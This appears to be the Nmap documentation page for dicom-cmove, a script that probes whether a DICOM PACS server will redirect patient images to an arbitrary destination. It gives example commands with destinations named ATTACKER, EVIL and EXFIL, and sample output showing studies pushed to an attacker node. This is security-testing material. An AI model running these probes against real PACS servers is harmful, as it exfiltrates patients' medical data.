Script dicom-cmove
Script types:
portrule
Categories:
discovery, intrusive
Download: https://svn.nmap.org/nmap/scripts/dicom-cmove.nse
Script Summary
DICOM C-MOVE redirection probe and data exfiltration proof-of-concept.
Tests whether a DICOM PACS/server will honour C-MOVE requests that redirect patient data to an arbitrary destination AE Title. C-MOVE is an SSRF-like primitive: the attacker tells the SCP to push images to a third-party host (or back to the attacker) without needing the target to be in the modality worklist. This is the most dangerous Q/R primitive because:
1. The attacker never receives data on the same association (unlike C-GET); instead, the SCP opens a NEW association to the destination and sends C-STORE sub-operations. 2. If the destination AE is configured in the PACS, the move succeeds silently - the attacker can exfiltrate data to any registered node. 3. Even if the destination is unknown, the SCP may still attempt a TCP connection to resolve it (observable as an outbound connection attempt).
The workflow: 1. (Optional) C-FIND at STUDY level to discover studies 2. C-MOVE-RQ with a configurable MoveDestination AE Title 3. Monitor C-MOVE-RSP status (PENDING progress, SUCCESS, or FAILURE) 4. Report whether the PACS accepted the move, how many sub-operations completed/failed/warned, and any error status codes
This script does NOT set up a listener to receive the redirected images. Use dicom-get.nse if you want to actually download data. This script's purpose is to prove that arbitrary-destination C-MOVE is accepted.
WARNING: This is an intrusive script. A successful C-MOVE causes the target PACS to attempt to push patient data to the specified destination. Only use against systems for which you have explicit written authorisation.
Requires the dicom.lua library (place in nselib/ or same directory).
Script Arguments
- dicom-cmove.level
Move level: "STUDY", "SERIES", "IMAGE" (default: "STUDY")
- dicom-cmove.info_model
Q/R information model: "study" or "patient" (default: "study")
- dicom-cmove.max_studies
Max studies to attempt C-MOVE on (default: 1)
- dicom-cmove.patient_name
Patient name filter for C-FIND discovery (default: "*")
- dicom-cmove.study_uid
Specific StudyInstanceUID to move (default: discover via C-FIND)
- dicom-cmove.max_pdu
Max PDU Length (default: 16384)
- dicom-cmove.series_uid
Specific SeriesInstanceUID to move (requires study_uid)
- dicom-cmove.dest_ae
MoveDestination AE Title - where to redirect data (default: "YOURPACS")
- dicom-cmove.timeout
DIMSE timeout in seconds (default: 15)
- dicom-cmove.modality
Modality filter for C-FIND discovery (default: "")
- dicom-cmove.patient_id
Patient ID filter for C-FIND discovery (default: "")
- dicom-cmove.calling_ae
Our AE Title (default: "NMAP-MOVE")
- dicom-cmove.called_ae
Target AE Title (default: "ANY-SCP")
- dicom.called_aet, dicom.calling_aet
See the documentation for the dicom library.
Example Usage
nmap -p 4242 --script dicom-cmove \ --script-args 'dicom-cmove.called_ae=ORTHANC,dicom-cmove.dest_ae=ATTACKER' <target>
# Move a specific study to a destination AE nmap -p 4242 --script dicom-cmove \ --script-args 'dicom-cmove.called_ae=ORTHANC,dicom-cmove.study_uid=1.2.3.4.5,dicom-cmove.dest_ae=EVIL' <target>
# Probe with patient root model and custom timeout nmap -p 4242 --script dicom-cmove \ --script-args 'dicom-cmove.called_ae=ORTHANC,dicom-cmove.dest_ae=EXFIL,dicom-cmove.info_model=patient,dicom-cmove.timeout=15' <target>
Script Output
PORT STATE SERVICE 4242/tcp open dicom | dicom-cmove: | Target AE: ORTHANC Calling AE: NMAP-MOVE | MoveDestination: ATTACKER | Studies discovered: 2 (via C-FIND) | C-MOVE Results: | Study 1.2.826...514 - Doe^John (PT_001) | Status: REFUSED (0xA801) - Move destination unknown | Completed: 0 Failed: 0 Warning: 0 | Study 1.2.826...515 - Smith^Jane (PT_002) | Status: SUCCESS (0x0000) | Completed: 45 Failed: 0 Warning: 0 | WARNING: PACS pushed 45 instances to 'ATTACKER' | Summary: 1/2 studies accepted C-MOVE redirection | VULNERABILITY: Server redirects patient data to arbitrary AE titles |_
Requires
Author:
License: Same as Nmap -- See https://nmap.org/book/man-legal.html
action
- action (host, port)
-
MAIN ACTION
Parameters
- host
- port
